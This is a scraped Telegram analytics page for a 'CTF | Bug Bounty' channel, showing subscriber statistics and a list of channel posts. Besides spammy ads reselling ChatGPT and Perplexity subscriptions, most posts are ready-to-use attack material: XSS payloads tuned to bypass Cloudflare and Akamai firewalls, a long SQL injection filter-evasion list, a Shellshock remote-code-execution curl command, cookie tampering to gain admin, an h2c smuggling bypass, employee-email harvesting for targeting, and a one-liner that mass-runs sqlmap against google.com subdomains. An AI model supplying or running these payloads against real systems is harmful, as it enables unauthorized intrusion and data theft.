CTF | Bug Bounty
前往频道在 Telegram
🔐 Join Us for 🔐 🌐 CTF Resources 🌐 Bug Bounty Resources 🌐 CTF Challenges and More Join now: https://t.me/ctftm 👤 Owner: Team Matrix ᴅᴍᴄᴀ/ᴄᴏᴘʏʀɪɢʜᴛ ᴄʟᴀɪᴍ : @Dmcatm Admin Contact: @Teammatrixs_bot
显示更多8 335
订阅者
无数据24 小时
-117 天
-24330 天
数据加载中...
相似频道
标签云
进出提及
---
---
---
---
---
---
吸引订阅者
四月 '26
四月 '26
+7
在0个频道中
三月 '26
+44
在0个频道中
Get PRO
二月 '26
+88
在0个频道中
Get PRO
一月 '26
+59
在0个频道中
Get PRO
十二月 '25
+33
在0个频道中
Get PRO
十一月 '25
+53
在0个频道中
Get PRO
十月 '25
+52
在0个频道中
Get PRO
九月 '25
+58
在0个频道中
Get PRO
八月 '25
+64
在0个频道中
Get PRO
七月 '25
+190
在0个频道中
Get PRO
六月 '25
+101
在0个频道中
Get PRO
五月 '25
+152
在0个频道中
Get PRO
四月 '25
+434
在0个频道中
Get PRO
三月 '25
+162
在0个频道中
Get PRO
二月 '25
+115
在0个频道中
Get PRO
一月 '25
+121
在0个频道中
Get PRO
十二月 '24
+160
在1个频道中
Get PRO
十一月 '24
+118
在0个频道中
Get PRO
十月 '24
+214
在0个频道中
Get PRO
九月 '24
+196
在0个频道中
Get PRO
八月 '24
+145
在1个频道中
Get PRO
七月 '24
+43
在1个频道中
Get PRO
六月 '24
+70
在1个频道中
Get PRO
五月 '24
+88
在0个频道中
Get PRO
四月 '24
+58
在0个频道中
Get PRO
三月 '24
+150
在0个频道中
Get PRO
二月 '24
+124
在0个频道中
Get PRO
一月 '24
+98
在0个频道中
Get PRO
十二月 '23
+95
在0个频道中
Get PRO
十一月 '23
+73
在2个频道中
Get PRO
十月 '23
+125
在0个频道中
Get PRO
九月 '23
+470
在0个频道中
Get PRO
八月 '23
+223
在0个频道中
Get PRO
七月 '23
+113
在0个频道中
Get PRO
六月 '23
+85
在0个频道中
Get PRO
五月 '23
+58
在0个频道中
Get PRO
四月 '23
+44
在0个频道中
Get PRO
三月 '23
+141
在0个频道中
Get PRO
二月 '23
+93
在0个频道中
Get PRO
一月 '23
+117
在0个频道中
Get PRO
十二月 '22
+116
在0个频道中
Get PRO
十一月 '22
+124
在0个频道中
Get PRO
十月 '22
+217
在0个频道中
Get PRO
九月 '22
+160
在0个频道中
Get PRO
八月 '22
+78
在0个频道中
Get PRO
七月 '22
+98
在0个频道中
Get PRO
六月 '22
+86
在0个频道中
Get PRO
五月 '22
+89
在0个频道中
Get PRO
四月 '22
+128
在0个频道中
Get PRO
三月 '22
+86
在0个频道中
Get PRO
二月 '22
+360
在0个频道中
Get PRO
一月 '22
+77
在0个频道中
Get PRO
十二月 '21
+1 682
在0个频道中
Get PRO
十一月 '21
+129
在0个频道中
Get PRO
十月 '21
+173
在0个频道中
Get PRO
九月 '21
+290
在0个频道中
Get PRO
八月 '21
+308
在0个频道中
Get PRO
七月 '21
+1 065
在0个频道中
Get PRO
六月 '21
+2 192
在0个频道中
Get PRO
五月 '21
+728
在0个频道中
Get PRO
四月 '21
+1 148
在0个频道中
Get PRO
三月 '21
+1 395
在0个频道中
| 日期 | 订阅者增长 | 提及 | 频道 | |
| 05 四月 | +2 | |||
| 04 四月 | +2 | |||
| 03 四月 | +1 | |||
| 02 四月 | +1 | |||
| 01 四月 | +1 |
频道帖子
🔥 Perplexity 1-Year Subscription!
- ChatGPT, Gemini AI – All Modules Unlocked
- Activated in Your Own Email
- Price: 2000 BDT
- Available Slots: Only 3 — Extremely Limited!
📥 Order Now on WhatsApp: wa.me/8801303818319
| 2 | 🔥 ৪ বছরের জন্য ওয়েব হোস্টিং এখন মাত্র $74.88!
💥 আগের দাম ছিল $621.60, এখন পাচ্ছেন ৯০% ছাড়ে!
⏰ অফার শেষ হতে মাত্র ১৮ ঘণ্টা বাকি!
যারা নতুন ওয়েবসাইট শুরু করতে চান বা পুরনো হোস্টিং আপগ্রেড করতে চান —
Hostinger নিয়ে এলো Black Friday Special Deal!
আপনার যা যা পাবেন:
✅ ২৫টি ওয়েবসাইট হোস্ট করার সুযোগ
✅ Free SSL Certificate
✅ ২৫ GB SSD Storage
✅ ৪ বছরের জন্য নিশ্চিন্ত হোস্টিং
✅ Free Domain Name
💲মোট মূল্য: $74.88 (৪ বছরের জন্য)
এই দারুণ ছাড় পেতে ব্যবহার করুন আমার রেফারেল লিংকঃ
🔗 https://hostinger.com?REFERRALCODE=KIJTEAMTHEM6
বিশেষ বোনাস:
✅ ব্ল্যাক ফ্রাইডে ডিলে সর্বোচ্চ ডিসকাউন্ট
✅ এছাড়াও, Hostinger-এর অন্য সব হোস্টিং প্ল্যানেও পাবেন অতিরিক্ত ২০% ছাড় যদি আমার রেফারেল লিংক ব্যবহার করেন!
এখনই কিনে ফেলুন — এই সুযোগ আর আসবে না! | 632 |
| 3 | Bug Bounty Pro Tip: #H2C Upgrade Bypass
Target: Applications using HTTP/2 Cleartext (h2c) upgrades.
The Core Idea: Many Web Application Firewalls (WAFs) and reverse proxies process HTTP/1.1 but fail to correctly inspect traffic after it's upgraded to HTTP/2.
How to Test:
1. Find a target that accepts an Upgrade: h2c header (common in Java, gRPC, and some reverse proxies like Nginx).
2. Send an initial HTTP/1.1 request with the upgrade header:
GET / HTTP/1.1
Host: example.com
Upgrade: h2c
Connection: Upgrade
3. If the server agrees (responds with HTTP/1.1 101 Switching Protocols), the connection is now HTTP/2.
4. The Bypass: Craft and send malformed or smuggled HTTP/2 frames (e.g., with the :method header set to GET or POST). The downstream WAF may not parse this, allowing you to access internal endpoints or bypass security controls.
Why it works: The security boundary often only exists at the HTTP/1.1 layer. Once upgraded, your HTTP/2 traffic might be forwarded directly to the backend without inspection. | 927 |
| 4 | 400TK Discount!
Today Special Offer!
🚀 ChatGPT – 1 Month Subscription Offer!
💰 Offer Price: 1100 TK
📧 Personal Account – on your own email ✅
📦 Available Slots: 20 Only – Limited Stock!
📥 Order Now on WhatsApp: wa.me/8801303818319 | 1 105 |
| 5 | New bug bounty target! Check out https://investaxes.com/.well-known/security.txt for details on their vulnerability disclosure program. Happy hunting! | 2 038 |
| 6 | NEW BUG BOUNTY PLATFORM https://www.hackprove.com/ | 2 092 |
| 7 | CF-Hero is a reconnaissance tool that uses multiple data sources to discover the origin IP addresses of Cloudflare-protected web applications.
https://github.com/musana/CF-Hero | 2 255 |
| 8 | 🔍 Bug Bounty Web Checklist
Track your web pentesting progress by checking each subcategory.
https://nemocyberworld.github.io/BugBountyCheckList/ | 2 163 |
| 9 | Shodan Dorks
https://github.com/nullfuzz-pentest/shodan-dorks | 2 015 |
| 10 | APKDeepLens is a Python based tool designed to scan Android applications (APK files) for security vulnerabilities. It specifically targets the OWASP Top 10 mobile vulnerabilities, providing an easy and efficient way for developers, penetration testers, and security researchers to assess the security posture of Android apps.
GitHub: https://github.com/d78ui98/APKDeepLens | 1 872 |
| 11 | Xss Payload
<input/onmouseover="javaSCRIPT:confirm(1)” | 1 050 |
| 12 | bypass XSS Cloudflare WAF
Encoded Payload:
"><track/onerror='confirm\%601\%60'>
Clean Payload:
"><track/onerror='confirm1'>
HTML entity & URL encoding:
" --> "
> --> >
< --> <
' --> '
` --> \%60
#Bypass #XSS #WAF | 1 221 |
| 13 | Bypass SQL union select
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+
#Bypass #SQL | 961 |
| 14 | Akamai WAF bypass XSS
<input id=b value=javascrip>
<input id=c value=t:aler>
<input id=d value=t(1)>
<lol
contenteditable
onbeforeinput='location=b.value+c.value+d.value'>
click and write here!
#WAF #Bypass | 969 |
| 15 | 🔰 Collect emails, usernames from commit history of repos of an org from GitHub for more personalized targeting of employees.
GitHub: ghintel.secrets.ninja | 1 417 |
| 16 | 🔰Download all bug bounty programs domains in scope items!
Get a full list of domains from active bug bounty programs across platforms like HackerOne, Bugcrowd, Intigriti, and more – all in one place!
👇🏼Step 1: Download the domains.txt file
📂step 2: Extract only main/root domains
cat domains.txt | awk -F '.' '{print $(NF-1)"."$NF}' | grep -Eo '([a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}' | sort -u > main_domains
📂Step 3: Extract all IP addresses:
grep -Eo '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' domains.txt > ips.txt
Don't forget to give reactions❤️ | 1 503 |
| 17 | A simple hunt can flip the whole game!🌀
While testing a web app, I noticed this suspicious-looking session cookie:
Cookie: session=e3VzZXI6ZGFya3NoYWRvdyxyb2xlOnVzZXJ9Cg==
I quickly ran it through Base64 decoding:
echo "e3VzZXI6ZGFya3NoYWRvdyxyb2xlOnVzZXJ9Cg==" | base64 -d
{user:darkshadow,role:user}
Wow 😳 — it's a JSON-style string in plain Base64.
Time to see how deep the rabbit hole goes...
I modified the role from user to admin:
echo "{user:darkshadow,role:admin}" | base64
e3VzZXI6ZGFya3NoYWRvdyxyb2xlOmFkbWlufQo=
Then replaced the cookie:
Cookie: session=e3VzZXI6ZGFya3NoYWRvdyxyb2xlOmFkbWlufQo=
BOOM 💥 Instantly, we got admin access!🔥
#collected | 1 445 |
| 18 | Shellshock Exploit To Inject The Header By RCE.
curl -H "User-Agent: () { :; }; /bin/eject" http://example.com
I used /bin/eject to avoid making any demonstrative effect. You can edit. | 1 410 |
| 19 | Good XSS Hunting Method.
echo "http://example.com" | waybackurls | gf xss | xargs -I {} python3 XSStrike/xsstrike.py -u {} | 1 281 |
| 20 | A Method To Get Subdomains And Scan All By SQLmap And Save Vulns.
subfinder -d google.com -o subdomains.txt && sqlmap -m subdomains.txt --batch --random-agent --crawl=1 --dbs | tee sqlmap_output.txt | grep -E "available databases|[*]" > vulnerable.txt | 1 226 |
